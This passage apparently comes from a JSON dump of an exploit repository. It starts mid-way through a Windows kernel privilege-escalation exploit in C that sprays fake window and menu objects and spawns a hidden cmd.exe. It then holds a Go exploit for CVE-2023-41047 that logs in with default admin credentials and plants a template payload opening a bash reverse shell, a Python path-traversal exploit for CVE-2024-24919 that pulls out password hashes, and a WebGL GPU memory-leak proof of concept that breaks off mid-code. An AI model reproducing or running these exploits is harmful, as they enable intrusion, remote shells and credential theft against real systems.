0x10000);\n\n\n\n    ptagWNDFake = (PULONGLONG)((PBYTE)0x304140);\n    ptagWNDFake[0] = (ULONGLONG)0x304140;\n\n    ptagWNDFake[2] = (ULONGLONG)0x304140 + 0x10;\n\n\n\n    ptagWNDFake[6] = (ULONGLONG)0x304140;\n    ptagWNDFake[8] = 0x305300;\n\n    ptagWNDFake[11] = (ULONGLONG)MENU_add;\n    ptagWNDFake[68] = (ULONGLONG)0x304140 + 0x230;\n    ptagWNDFake[69] = (ULONGLONG)0x304140 + 0x28;\n    ptagWNDFake[70] = (ULONGLONG)0x304140 + 0x30;\n    ptagWNDFake[71] = (ULONGLONG)0x000004;\n\n\n    ptagWNDFake1 = (PULONGLONG)((PBYTE)0x305300);\n    ptagWNDFake1[1] = (ULONGLONG)0x11;\n    ptagWNDFake1[2] = (ULONGLONG)0x305320;\n    ptagWNDFake1[6] = (ULONGLONG)0x1000000000020000;\n    ptagWNDFake1[8] = (ULONGLONG)0x00000000029d0000;\n    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;\n\n\n    ptagWNDFake1[14] = (ULONGLONG)0x306500;\n    ptagWNDFake1[16] = (ULONGLONG)305400;\n\n\n    ptagWNDFake2 = (PULONGLONG)((PBYTE)0x306500);\n    ptagWNDFake1[11] = (ULONGLONG)0x306600;\n\n\n\n    WNDCLASSEX WndClass = { 0 };\n    WndClass.cbSize = sizeof(WNDCLASSEX);\n    WndClass.lpfnWndProc = DefWindowProc;\n    WndClass.style = CS_VREDRAW | CS_HREDRAW;\n    WndClass.cbWndExtra = 0xe0;\n    WndClass.hInstance = NULL;\n    WndClass.lpszMenuName = NULL;\n    WndClass.lpszClassName = L\"NormalClass\";\n    \n    RegisterClassEx(&WndClass);\n\n    for (int i = 0; i < 0x200; i++)\n    {\n        HMENUL_list[i] = CreateMenu();\n    }\n    for (int i = 0; i < 0x100; i++)\n    {\n        HWND_list[i] = CreateWindowEx(NULL, L\"NormalClass\", NULL, WS_VISIBLE, 0, 0, 0, 0, NULL, HMENUL_list[i], NULL, NULL);\n\n    }\n    for (int i = 0; i < 0x100; i++)\n    {\n       \n\n        SetWindowLongPtr(HWND_list[i], 0x58, (LONG_PTR)0x0002080000000000);\n\n        SetWindowLongPtr(HWND_list[i], 0x80, (LONG_PTR)0x0000303030000000);\n\n    }\n    \n\n    for (int i = 0x20; i < 0x60; i++)\n    {\n        if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01)- (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 - 1], 0x01)== 0x250)\n        {\n            if ((ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2 + 1], 0x01)-(ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i * 2], 0x01) == 0x250)\n            {\n                HWND_add = (ULONGLONG)xxGetHMValidateHandle((HMENU)HWND_list[i*2], 0x01);\n                max = i * 2;\n                break;\n            }\n        }\n        if (i == 0x5f)\n        {\n            HWND_add = 0;\n        }\n\n    }\n    \n    ptagWNDFake1[11] = (ULONGLONG)HWND_add + 0x63 - 0x120;\n\n\n    DestroyWindow(HWND_list[max]);\n    \n    createclass();\n\n\n    \n    // Create a fake spmenu\n    PVOID hHeap = (PVOID)0x302000;\n\n    g_pFakeMenu = (tagMENU*)(PVOID)0x302000;\n    g_pFakeMenu->ref = (PVOID)0x302300;\n    *(PULONG64)g_pFakeMenu->ref = (ULONG64)g_pFakeMenu;\n    // cItems = 1\n    g_pFakeMenu->obj28 = (PVOID)0x302200;\n    *(PULONG64)((PBYTE)g_pFakeMenu->obj28 + 0x2C) = 1;\n    // rgItems\n    g_pFakeMenu->rgItems = (PVOID)0x304000;\n    // cx / cy must > 0\n    g_pFakeMenu->flag1 = 1;\n    g_pFakeMenu->flag2 = 1;\n    g_pFakeMenu->cxMenu = 1;\n    g_pFakeMenu->cyMenu = 1;\n\n\n    //\n    \n}\nint WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)\n{\n    ULONGLONG gsValue = 0;\n    unsigned char shellcode[] = \"\\x65\\x48\\x8B\\x04\\x25\\x30\\x00\\x00\\x00\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\x90\\xc3\";\n\n    LPVOID executableMemory = VirtualAlloc(NULL, sizeof(shellcode), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);\n    if (executableMemory == NULL) {\n        return 1;\n    }\n    memcpy(executableMemory, shellcode, sizeof(shellcode));\n    \n    gsValue = ((ULONGLONG(*)())executableMemory)();\n    gsValue = gsValue + 0x800;\n    GS_hanlde = (PULONGLONG)(PBYTE)gsValue;\n    GS_off = GS_hanlde[5];\n\n    char str[0xb8] = \"\";\n    memset(str, 0x41, 0xa8);\n    g_NtUserEnableMenuItem = (NtUserEnableMenuItem)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserEnableMenuItem\");\n    g_NtUserSetClassLongPtr = (NtUserSetClassLongPtr)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserSetClassLongPtr\");\n    g_NtUserCreateAcceleratorTable = (NtUserCreateAcceleratorTable)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserCreateAcceleratorTable\");\n    g_pfnNtUserConsoleControl = (fnNtUserConsoleControl)GetProcAddress(GetModuleHandleA(\"win32u.dll\"), \"NtUserConsoleControl\");\n\n    WNDCLASS wc = { 0 };\n\n    wc.lpfnWndProc = WndProc;\n    wc.hInstance = hInstance;\n    wc.lpszClassName = TEXT(\"EnableMenuItem\");\n\n    RegisterClass(&wc);\n\n    HWND hWnd = CreateWindow(\n        wc.lpszClassName,\n        TEXT(\"EnableMenuItem\"),\n        WS_OVERLAPPEDWINDOW,\n        CW_USEDEFAULT,\n        CW_USEDEFAULT,\n        400, 300,\n        NULL,\n        NULL,\n        hInstance,\n        NULL\n    );\n\n    if (!hWnd) return FALSE;\n\n    ///\n\n\n    hSystemMenu = GetSystemMenu(hWnd, FALSE);\n\n    hSubMenu = CreatePopupMenu(); \n    MENU_add = GetMenuHandle(hSubMenu);\n    hMenuB = CreateMenu();\n\n    buildmem();\n    if (HWND_add == 0)\n    {\n        return 0;\n    }\n\n\n    AppendMenu(hSubMenu, MF_STRING, 0x2061, TEXT(\"0\"));\n    AppendMenu(hSubMenu, MF_STRING, 0xf060, TEXT(\"1\"));\n\n    DeleteMenu(hSystemMenu, SC_CLOSE, MF_BYCOMMAND);\n\n    AppendMenu(hMenuB, MF_POPUP, (UINT_PTR)hSubMenu, L\"Menu A\");\n\n    AppendMenu(hSystemMenu, MF_POPUP, (UINT_PTR)hMenuB, L\"Menu B\");\n\n\n    \n    ShowWindow(hWnd, nCmdShow);\n    UpdateWindow(hWnd);\n\n    flag = 1;\n    g_NtUserEnableMenuItem(hSystemMenu, 0xf060, 0x01);\n\n    exploit();\n\n    MSG msg = { 0 };\n\n    while (GetMessage(&msg, NULL, 0, 0))\n    {\n        TranslateMessage(&msg);\n        DispatchMessage(&msg);\n    }\n\n    return (int)msg.wParam;\n}\n\nLRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)\n{\n    switch (message)\n    {\n    case WM_DESTROY:\n        PostQuitMessage(0);\n        return 0;\n    case 0xae:\n        switch (wParam)\n        {\n        case 0x1000:\n            if (flag)\n            {\n                int itemCount = GetMenuItemCount(hMenuB);  \n\n                for (int i = itemCount - 1; i >= 0; i--) {\n                    RemoveMenu(hMenuB, i, MF_BYPOSITION);\n                }\n                DestroyMenu(hSubMenu);\n                xxReallocPopupMenu();\n            }\n        case 0x1001:\n            if (flag)\n            {\n                int itemCount = GetMenuItemCount(hMenuB);  \n\n                for (int i = itemCount - 1; i >= 0; i--) {\n                    RemoveMenu(hMenuB, i, MF_BYPOSITION);\n                }\n                DestroyMenu(hSubMenu);\n                xxReallocPopupMenu();\n            }\n\n            return 0;\n        }\n        break;\n\n\n    }\n\n    return DefWindowProc(hWnd, message, wParam, lParam);\n}\nint syytem()\n{\n    SECURITY_ATTRIBUTES     sa;\n    HANDLE                  hRead, hWrite;\n    byte                    buf[40960] = { 0 };\n    STARTUPINFOW            si;\n    PROCESS_INFORMATION     pi;\n    DWORD                   bytesRead;\n    RtlSecureZeroMemory(&si, sizeof(si));\n    RtlSecureZeroMemory(&pi, sizeof(pi));\n    RtlSecureZeroMemory(&sa, sizeof(sa));\n    int br = 0;\n    sa.nLength = sizeof(SECURITY_ATTRIBUTES);\n    sa.lpSecurityDescriptor = NULL;\n    sa.bInheritHandle = TRUE;\n    if (!CreatePipe(&hRead, &hWrite, &sa, 0))\n    {\n        return -3;\n    }\n\n    si.cb = sizeof(STARTUPINFO);\n    GetStartupInfoW(&si);\n    si.hStdError = hWrite;\n    si.hStdOutput = hWrite;\n    si.wShowWindow = SW_HIDE;\n    si.lpDesktop = L\"WinSta0\\\\Default\";\n    si.dwFlags = STARTF_USESHOWWINDOW | STARTF_USESTDHANDLES;\n    wchar_t cmd[4096] = { L\"cmd.exe\" };\n\n    if (!CreateProcessW(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &si, &pi))\n    {\n        CloseHandle(hWrite);\n        CloseHandle(hRead);\n        printf(\"[!] CreateProcessW Failed![%lx]\\n\", GetLastError());\n        return -2;\n    }\n    CloseHandle(hWrite);\n\n}\n"
  },
  {
    "path": "CVE-2023-41047/CVE-2023-41047.go",
    "content": "package main\n\nimport (\n\t\"crypto/tls\"\n\t\"fmt\"\n\t\"log\"\n\t\"net/http\"\n\t\"net/url\"\n\t\"os\"\n\t\"strings\"\n\t\"sync\"\n)\n\nvar (\n\tPROXYURL = \"\"\n)\n\nconst CSRFTOKEN = \"ImU4ZmY1NDhlZTU1ZGI5M2I2MjA3YmZhYjAxY2QzOWQxOTRiN2Q0YTgi.ZUn0tg.OEMZhA3pw-YZTkm7INGV0FBBjZg\"\n\nfunc getLoginCookie(uri string) string {\n\turi += \"/api/login\"\n\tproxy, _ := url.Parse(PROXYURL)\n\ttr := &http.Transport{\n\t\tProxy:           http.ProxyURL(proxy),\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\tclient := &http.Client{\n\t\tTransport: tr,\n\t}\n\n\tdata := `{\"user\":\"admin\",\"pass\":\"admin\",\"remember\":false}`\n\n\treq, err := http.NewRequest(\"POST\", uri, strings.NewReader(data))\n\n\tif err != nil {\n\t\tlog.Println(\"Error creating request:\", err)\n\t}\n\n\treq.Header.Set(\"Content-Type\", \"application/json; charset=UTF-8\")\n\t//req.Header.Set(\"X-CSRF-Token\", CSRFTOKEN)\n\t//req.Header.Set(\"Cookie\", \"csrf_token_P5000=\"+CSRFTOKEN)\n\n\tresp, err := client.Do(req)\n\n\tif err != nil {\n\t\tlog.Println(\"Error making request:\", err)\n\t}\n\n\tdefer resp.Body.Close()\n\n\tif resp.StatusCode != http.StatusOK {\n\t\tlog.Printf(\"HTTP request failed with status code: %d\\n\", resp.StatusCode)\n\t}\n\n\tcookies := resp.Cookies()\n\tif len(cookies) == 0 {\n\t\tlog.Println(\"No cookies found in the response.\")\n\t}\n\n\tcookieStr := \"\"\n\n\tfor _, cookie := range cookies {\n\t\tif cookie.Name == \"session_P5000\" {\n\t\t\tcookieStr = \"csrf_token_P5000= \" + CSRFTOKEN + \";\" + cookie.Name + \"=\" + cookie.Value\n\t\t}\n\t\t//log.Printf(\"Name: %s, Value: %s\\n\", cookie.Name, cookie.Value)\n\t}\n\n\treturn cookieStr\n}\n\nfunc setRequest(uri string, cookie string, payload string, types int, wg *sync.WaitGroup) {\n\tdefer wg.Done()\n\tif types == 0 {\n\t\turi += \"/api/settings\"\n\t} else if types == 1 {\n\t\turi += \"/api/connection\"\n\t}\n\n\tproxy, _ := url.Parse(PROXYURL)\n\ttr := &http.Transport{\n\t\tProxy:           http.ProxyURL(proxy),\n\t\tTLSClientConfig: &tls.Config{InsecureSkipVerify: true},\n\t}\n\tclient := &http.Client{\n\t\tTransport: tr,\n\t}\n\n\treq, err := http.NewRequest(\"POST\", uri, strings.NewReader(payload))\n\n\tif err != nil {\n\t\tlog.Println(\"Error creating request:\", err)\n\t}\n\n\treq.Header.Set(\"Content-Type\", \"application/json\")\n\treq.Header.Set(\"X-CSRF-Token\", CSRFTOKEN)\n\treq.Header.Set(\"Cookie\", cookie)\n\n\t_, err = client.Do(req)\n\n\tif err != nil {\n\t\tlog.Println(\"Error making request:\", err)\n\t}\n\n\t//defer resp.Body.Close()\n\n\t//log.Println(resp.StatusCode)\n}\n\nfunc main() {\n\n\tif len(os.Args) <= 4 {\n\t\tfmt.Println(\"Usage: ./CVE-2023-41047 <target> <proxyUrl> <reverse IP> <reverse PORT>\")\n\t\treturn\n\t}\n\n\turi := os.Args[1]\n\tPROXYURL = os.Args[2]\n\treverseIP := os.Args[3]\n\treversePort := os.Args[4]\n\n\tcookie := getLoginCookie(uri)\n\n\tvar wg sync.WaitGroup\n\twg.Add(1)\n\n\tlog.Println(\"[*] Start...\")\n\t// Turn on virtual printer\n\tpayload := `{\"plugins\":{\"virtual_printer\":{\"enabled\":true}},\"temperature\":{\"profiles\":[{\"name\":\"ABS\",\"extruder\":210,\"bed\":100,\"chamber\":null},{\"name\":\"PLA\",\"extruder\":180,\"bed\":60,\"chamber\":null}]}}`\n\tgo setRequest(uri, cookie, payload, 0, &wg)\n\tlog.Println(\"[+] Step 1 finish...\")\n\t// Set evil gcode\n\tpayload = `{\"scripts\":{\"gcode\":{\"afterPrinterConnected\":\"{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__=='catch_warnings' %} {{ c.__init__.__globals__['__builtins__'].eval(\\\"__import__('os').popen('bash -c \\\\\\\"bash -i  >&/dev/tcp/` + reverseIP + `/` + reversePort + ` 0>&1\\\\\\\"').read()\\\") }} {% endif %} {% endfor %}\"}},\"temperature\":{\"profiles\":[{\"name\":\"ABS\",\"extruder\":210,\"bed\":100,\"chamber\":null},{\"name\":\"PLA\",\"extruder\":180,\"bed\":60,\"chamber\":null}]}}`\n\tgo setRequest(uri, cookie, payload, 0, &wg)\n\tlog.Println(\"[+] Step 2 finish...\")\n\n\tpayload = `{\"port\":\"AUTO\",\"baudrate\":0,\"printerProfile\":\"_default\",\"autoconnect\":false,\"command\":\"connect\"}`\n\tgo setRequest(uri, cookie, payload, 1, &wg)\n\tlog.Printf(\"[+] Step 3 reverse: tcp://%s:%s\", reverseIP, reversePort)\n\tpayload = `{\"command\":\"disconnect\"}`\n\tgo setRequest(uri, cookie, payload, 1, &wg)\n\n\twg.Wait()\n}\n"
  },
  {
    "path": "CVE-2024-24919/exp.py",
    "content": "\nimport argparse\nimport requests\nfrom urllib3.exceptions import InsecureRequestWarning\nimport re\nimport argparse\n\n\nrequests.packages.urllib3.disable_warnings(category=InsecureRequestWarning)\n\n\ndef parse_bin_data(bin_data):\n\n    internal_password_pattern = re.compile(rb\":internal_passw.{3}ord \\(([^)]+)\\)\", re.DOTALL)\n    internal_password_matches = list(internal_password_pattern.finditer(bin_data))\n    results = []\n\n    for match in internal_password_matches:\n        internal_password = match.group(1).decode('utf-8', errors='ignore').strip()\n\n        if internal_password:\n            preceding_text = bin_data[:match.start()]\n            name_pattern = re.compile(rb\":name \\(([^)]+)\\)\", re.DOTALL)\n            name_matches = list(name_pattern.finditer(preceding_text))\n\n            if name_matches:\n                name = name_matches[-1].group(1).decode('utf-8', errors='ignore').strip()\n\n                results.append({\n                    'name': name,\n                    'internal_password': internal_password\n                })\n    return results\n\ndef fget(url,filename):\n\n    session = requests.Session()\n\n    rawBody = \"/CSHELL/../../../../../../../{}\".format(filename)\n    headers = {\"Sec-Ch-Ua\":\"\\\"Chromium\\\";v=\\\"125\\\", \\\"Not.A/Brand\\\";v=\\\"24\\\"\",\"Accept\":\"*/*\",\"Sec-Ch-Ua-Platform\":\"\\\"macOS\\\"\",\"User-Agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.6422.60 Safari/537.36\",\"Referer\":\"https://192.168.161.110/sslvpnc/Portal/Main\",\"Connection\":\"keep-alive\",\"Sec-Fetch-Site\":\"same-origin\",\"Sec-Fetch-Dest\":\"script\",\"Accept-Encoding\":\"gzip, deflate, br\",\"Accept-Language\":\"zh-CN,zh;q=0.9\",\"Sec-Ch-Ua-Mobile\":\"?0\",\"Sec-Fetch-Mode\":\"no-cors\"}\n    response = session.get(\"{}/clients/MyCRL\".format(url), data=rawBody, headers=headers,verify=False)\n\n    s_filename = filename.split(\"/\")[-1]\n    if int(response.status_code)==200:\n        print('[+] The vulnerability exists, and the file will be saved locally.')\n        with open(s_filename, 'wb') as file:\n            file.write(response.content)\n        if \"fwauth.NDB\" in filename:\n            result = parse_bin_data(response.content)\n\n            print(\"[!] You can use hashcat for brute-forcing.\")\n            print(\"[!] The type of hash is DES(Unix).\")\n            for entry in result:\n                print(\"[+] \" + f\"Username: {entry['name']}, Password_Hash: {entry['internal_password']}\")\n    else:\n        print('[!] The target is inappropriate.')\n        exit()\n\nparser = argparse.ArgumentParser()\n\nparser.add_argument(dest = \"url\")\nparser.add_argument(dest = \"filename\")\n\nargs = parser.parse_args()\n\n\nfget(args.url,args.filename)\n"
  },
  {
    "path": "CVE-2026-5283/poc.html",
    "content": "<!DOCTYPE html>\n<html><head><title>CVE-2026-5283: GPU Address Leak</title>\n<style>\nbody{font-family:monospace;background:#111;color:#ddd;margin:20px}\ncanvas{border:1px solid #555;margin:3px}\npre{background:#0a0a0a;padding:10px;max-height:600px;overflow:auto;font-size:11px}\n.red{color:#f44;font-weight:bold}.grn{color:#4f4}.yel{color:#ff0}.cyan{color:#0ff}\n</style>\n</head>\n<body>\n<h3>CVE-2026-5283: GPU Internal Address Leak</h3>\n<div id=\"canvases\"></div>\n<pre id=\"log\"></pre>\n<script>\nconst L=s=>{const e=document.getElementById('log');e.innerHTML+=s+'\\n';e.scrollTop=e.scrollHeight};\nconst gl=document.createElement('canvas').getContext('webgl2');\nif(!gl){L('No WebGL2');throw'x'}\nconst dbg=gl.getExtension('WEBGL_debug_renderer_info');\nL('Renderer: '+(dbg?gl.getParameter(dbg.UNMASKED_RENDERER_WEBGL):gl.getParameter(gl.RENDERER)));\n\nconst SIZE=512, LAYERS=8, CLEAR_LAYER=3;\n\n/*\n * Strategy: GPU driver stores internal metadata (texture descriptors,\n * buffer descriptors, sampler states, render target info) in the same\n * GPU heap as texture data. These contain GPU virtual addresses.\n *\n * Phase 1: Create LOTS of GPU objects to generate internal metadata\n * Phase 2: Delete everything → metadata memory freed to GPU heap\n * Phase 3: Allocate array texture → reuses freed metadata memory\n * Phase 4: Trigger CVE-2026-5283 → read uninitialized layers\n * Phase 5: Scan leaked data for address-like patterns\n */\n\n/* ---- Phase 1: Create many GPU objects to spray internal metadata ---- */\nL('\\n[Phase 1] Creating GPU objects to spray driver metadata...');\n\nconst textures=[], fbos=[], rbs=[], bufs=[], samplers=[], vaos=[];\n\n/* Many textures with various formats → texture descriptors contain base_addr */\nfor(let i=0;i<100;i++){\n    const t=gl.createTexture();\n    gl.bindTexture(gl.TEXTURE_2D,t);\n    const sz=[64,128,256,512][i%4];\n    const fmt=[gl.RGBA8,gl.RGBA16F,gl.RGB8,gl.RG8][i%4];\n    const tp=[gl.UNSIGNED_BYTE,gl.HALF_FLOAT,gl.UNSIGNED_BYTE,gl.UNSIGNED_BYTE][i%4];\n    const bf=[gl.RGBA,gl.RGBA,gl.RGB,gl.RG][i%4];\n    gl.texImage2D(gl.TEXTURE_2D,0,fmt,sz,sz,0,bf,tp,null);\n    gl.texParameteri(gl.TEXTURE_2D,gl.TEXTURE_MIN_FILTER,gl.LINEAR_MIPMAP_LINEAR);\n    gl.generateMipmap(gl.TEXTURE_2D);\n    textures.push(t);\n}\nL('  100 textures with mipmaps');\n\n/* FBOs with attachments → render target descriptors */\nfor(let i=0;i<50;i++){\n    const f=gl.createFramebuffer();\n    gl.bindFramebuffer(gl.FRAMEBUFFER,f);\n    if(textures[i])\n        gl.framebufferTexture2D(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,gl.TEXTURE_2D,textures[i],0);\n    gl.bindFramebuffer(gl.FRAMEBUFFER,null);\n    fbos.push(f);\n}\nL('  50 FBOs');\n\n/* Renderbuffers → internal storage descriptors */\nfor(let i=0;i<50;i++){\n    const r=gl.createRenderbuffer();\n    gl.bindRenderbuffer(gl.RENDERBUFFER,r);\n    gl.renderbufferStorage(gl.RENDERBUFFER,[gl.RGBA8,gl.DEPTH24_STENCIL8,gl.DEPTH_COMPONENT16][i%3],[64,128,256][i%3],[64,128,256][i%3]);\n    rbs.push(r);\n}\nL('  50 renderbuffers');\n\n/* Buffers with data → buffer descriptors contain GPU addresses */\nfor(let i=0;i<100;i++){\n    const b=gl.createBuffer();\n    gl.bindBuffer(gl.ARRAY_BUFFER,b);\n    gl.bufferData(gl.ARRAY_BUFFER,[256,1024,4096,16384][i%4],gl.DYNAMIC_DRAW);\n    bufs.push(b);\n}\nL('  100 buffers');\n\n/* Samplers → sampler state objects */\nfor(let i=0;i<30;i++){\n    const s=gl.createSampler();\n    gl.samplerParameteri(s,gl.TEXTURE_MIN_FILTER,[gl.NEAREST,gl.LINEAR,gl.LINEAR_MIPMAP_LINEAR][i%3]);\n    gl.samplerParameteri(s,gl.TEXTURE_WRAP_S,[gl.REPEAT,gl.CLAMP_TO_EDGE,gl.MIRRORED_REPEAT][i%3]);\n    gl.bindSampler(i%4,s);\n    samplers.push(s);\n}\nL('  30 samplers');\n\n/* VAOs → vertex attrib state */\nfor(let i=0;i<30;i++){\n    const v=gl.createVertexArray();\n    gl.bindVertexArray(v);\n    if(bufs[i]){\n        gl.bindBuffer(gl.ARRAY_BUFFER,bufs[i]);\n        gl.vertexAttribPointer(0,4,gl.FLOAT,false,0,0);\n        gl.enableVertexAttribArray(0);\n    }\n    vaos.push(v);\n}\ngl.bindVertexArray(null);\nL('  30 VAOs');\n\n/* Force GPU to process all object creation */\ngl.finish();\n\n/* Also render into some FBOs to generate render target metadata */\nfor(let i=0;i<20;i++){\n    gl.bindFramebuffer(gl.FRAMEBUFFER,fbos[i]);\n    if(gl.checkFramebufferStatus(gl.FRAMEBUFFER)===gl.FRAMEBUFFER_COMPLETE){\n        gl.viewport(0,0,64,64);\n        gl.clearColor(Math.random(),Math.random(),Math.random(),1);\n        gl.clear(gl.COLOR_BUFFER_BIT);\n    }\n}\ngl.bindFramebuffer(gl.FRAMEBUFFER,null);\ngl.viewport(0,0,SIZE,SIZE);\ngl.finish();\nL('  Rendered to 20 FBOs');\n\n/* ---- Phase 2: Delete EVERYTHING to free metadata back to GPU heap ---- */\nL('\\n[Phase 2] Deleting all objects → driver metadata freed to GPU heap...');\n\nfor(const v of vaos) gl.deleteVertexArray(v);\nfor(const s of samplers){gl.deleteSampler(s);}\nfor(const f of fbos) gl.deleteFramebuffer(f);\nfor(const r of rbs) gl.deleteRenderbuffer(r);\nfor(const b of bufs) gl.deleteBuffer(b);\nfor(const t of textures) gl.deleteTexture(t);\ngl.finish();\nL('  Deleted 100 tex + 50 FBO + 50 RB + 100 buf + 30 sampler + 30 VAO');\n\n/* ---- Phase 3: Allocate array texture → reuse freed metadata memory ---- */\nL('\\n[Phase 3] Allocating target array texture...');\nconst tex2=gl.createTexture();\ngl.bindTexture(gl.TEXTURE_2D_ARRAY,tex2);\ngl.texImage3D(gl.TEXTURE_2D_ARRAY,0,gl.RGBA8,SIZE,SIZE,LAYERS,0,gl.RGBA,gl.UNSIGNED_BYTE,null);\n\n/* ---- Phase 4: Trigger CVE-2026-5283 ---- */\nconst clearFBO=gl.createFramebuffer();\ngl.bindFramebuffer(gl.FRAMEBUFFER,clearFBO);\ngl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,CLEAR_LAYER);\ngl.clearColor(0,1,0,1);\ngl.clear(gl.COLOR_BUFFER_BIT);\ngl.bindFramebuffer(gl.FRAMEBUFFER,null);\ngl.deleteFramebuffer(clearFBO);\nL('[Phase 4] Cleared layer '+CLEAR_LAYER+' only → bug triggered');\n\n/* ---- Phase 5: Read + scan for GPU addresses ---- */\nL('\\n[Phase 5] Scanning leaked data for GPU addresses...');\nlet totalLeaked=0;\nconst leakedData=[];\n\nfor(let layer=0;layer<LAYERS;layer++){\n    const readFBO=gl.createFramebuffer();\n    gl.bindFramebuffer(gl.FRAMEBUFFER,readFBO);\n    gl.framebufferTextureLayer(gl.FRAMEBUFFER,gl.COLOR_ATTACHMENT0,tex2,0,layer);\n    const px=new Uint8Array(SIZE*SIZE*4);\n    gl.readPixels(0,0,SIZE,SIZE,gl.RGBA,gl.UNSIGNED_BYTE,px);\n    gl.bindFramebuffer(gl.FRAMEBUFFER,null);\n    gl.deleteFramebuffer(readFBO);\n\n    let nonzero=0;\n    for(let i=0;i<px.length;i++) if(px[i]!==0) nonzero++;\n\n    if(layer===CLEAR_LAYER){L('  Layer '+layer+': CLEARED');continue}\n    if(nonzero===0){L('  Layer '+layer+': <span class=\"grn\">zeros</span>');continue}\n\n    totalLeaked+=nonzero;\n    leakedData.push({layer,px});\n    L('  Layer '+layer+': <span class=\"red\">LEAKED '+nonzero+' bytes</span>');\n\n    const u32=new Uint32Array(px.buffer);\n\n    /* Scan for address-like patterns:\n     * GPU virtual addresses on ARM Mali: typically 0x00000000-0x0000FFFF (low) or page-aligned\n     * GPU virtual addresses on Adreno: various ranges\n     * Look for: page-aligned values, non-zero upper bits, pointer-like patterns */\n\n    /* Pattern 1: Page-aligned values (multiple of 0x1000) */\n    let pageAligned=0;const pageAddrs=[];\n    for(let j=0;j<u32.length;j++){\n        if(u32[j]!==0 && (u32[j]&0xFFF)===0 && u32[j]<0xFFFF0000){\n            pageAligned++;\n            if(pageAddrs.length<8) pageAddrs.push('0x'+u32[j].toString(16).padStart(8,'0'));\n        }\n    }\n    if(pageAligned>5){\n        L('    <span class=\"cyan\">Page-aligned addresses: '+pageAligned+'</span>');\n        L('    <span class=\"cyan\">  '+pageAddrs.join(', ')+'</span>');\n    }\n\n    /* Pattern 2: Values in typical GPU VA ranges */\n    let gpuVA=0;const gpuAddrs=[];\n    for(let j=0;j<u32.length;j++){\n        const v=u32[j];\n        /* Common GPU VA ranges on mobile: 0x10000-0x80000000 */\n        if(v>=0x10000 && v<0x80000000 && v!==0x00FF00FF && v!==0xFF00FF00){\n            gpuVA++;\n            if(gpuAddrs.length<8) gpuAddrs.push('0x'+v.toString(16).padStart(8,'0'));\n        }\n    }\n    if(gpuVA>20){\n        L('    <span class=\"cyan\">GPU VA range values: '+gpuVA+'</span>');\n        L('    <span class=\"cyan\">  '+gpuAddrs.join(', ')+'</span>');\n    }\n\n    /* Pattern 3: Repeating pointer-like pairs (common in descriptor tables) */\n    let pairCount=0;const pairs=[];\n    for(let j=0;j<u32.length-1;j++){\n        const a=u32[j],b=u32[j+1];\n        if(a>=0x1000 && a<0x80000000 && b>=0x1000 && b<0x80000000 &&\n           Math.abs(a-b)<0x100000 && a!==b){\n            pairCount++;\n            if(pairs.length<4) pairs.push('(0x'+a.toString(16)+', 0x'+b.toString(16)+')');\n        }\n    }\n    if(pairCount>5){\n        L('    <span class=\"cyan\">Address pairs (descriptors?): '+pairCount+'</span>');\n        L('    <span class=\"cyan\">  '+pairs.join(', ')+'</span>');\n    }\n\n    /* Pattern 4: Non-trivial u32 values (not 0, not 0xFF, not 0xFFFF) */\n    const histogram={};\n    for(let j=0;j<u32.length;j++){\n        const v=u32[j];\n        if(v!==0 && v!==0xFF && v!==0xFF00 && v!==0xFF00FF && v!==0x00FF00FF &&\n           v!==0xFF00FF00 && v!==0xFFFFFFFF && v!==0xFF000000 && v!==0x00FF0000){\n            histogram[v]=(histogram[v]||0)+1;\n        }\n    }\n    const unique=Object.keys(histogram).length;\n    if(unique>100){\n        L('    <span class=\"cyan\">Unique non-trivial u32: '+unique+' (rich metadata!)</span>');\n        /* Show top repeated values — likely descriptor fields */\n        const sorted=Object.entries(histogram).sort((a,b)=>b[1]-a[1]).slice(0,5);\n        for(const[v,c]of sorted){\n            L('    <span class=\"yel\">  0x'+parseInt(v).toString(16).padStart(8,'0')+' × '+c+'</span>');\n        }\n    }\n\n    /* Entropy */\n    const hist=new Array(256).fill(0);\n    for(let i=0;i<px.length;i++) hist[px[i]]++;\n    let ent=0;\n    for(let i=0;i<256;i++){if(hist[i]>0){const p=hist[i]/px.length;ent-=p*Math.log2(p)}}\n    L('    Entropy: '+ent.toFixed(2)+' bits'+(ent>4?' <span class=\"red\">(VERY HIGH)</span>':ent>2?' <span class=\"yel\">(moderate)</span>':''));\n\n    /* Hex dump — first 128 bytes as both hex and u32 */\n    L('    Raw hex: '+Array.from(px.slice(0,64)).map(b=>b.toString(16).padStart(2,'0')).join(' '));\n    const u32_sample=new Uint32Array(px.buffer,0,16);\n    L('    As u32: '+Array.from(u32_sample).map(v=>'0x'+v.toString(16).padStart(8,'0')).join(' '));\n}\n\n/* Visualize */\nconst container=document.getElementById('canvases');\nfor(const{layer,px}of leakedData){\n    const c=document.createElement('canvas');c.width=256;c.height=256;\n    container.appendChild(c);const ctx=c.getContext('2d');\n    const img=ctx.createImageData(256,256);const sc=SIZE/256;\n    for(let y=0;y<256;y++)for(let x=0;x<256;x++){\n        const si=(Math.floor(y*sc)*SIZE+Math.floor(x*sc))*4,di=(y*256+x)*4;\n        img.data[di]=px[si];img.data[di+1]=px[si+1];img.data[di+2]=px[si+2];img.data[di+3]=255;\n    }\n    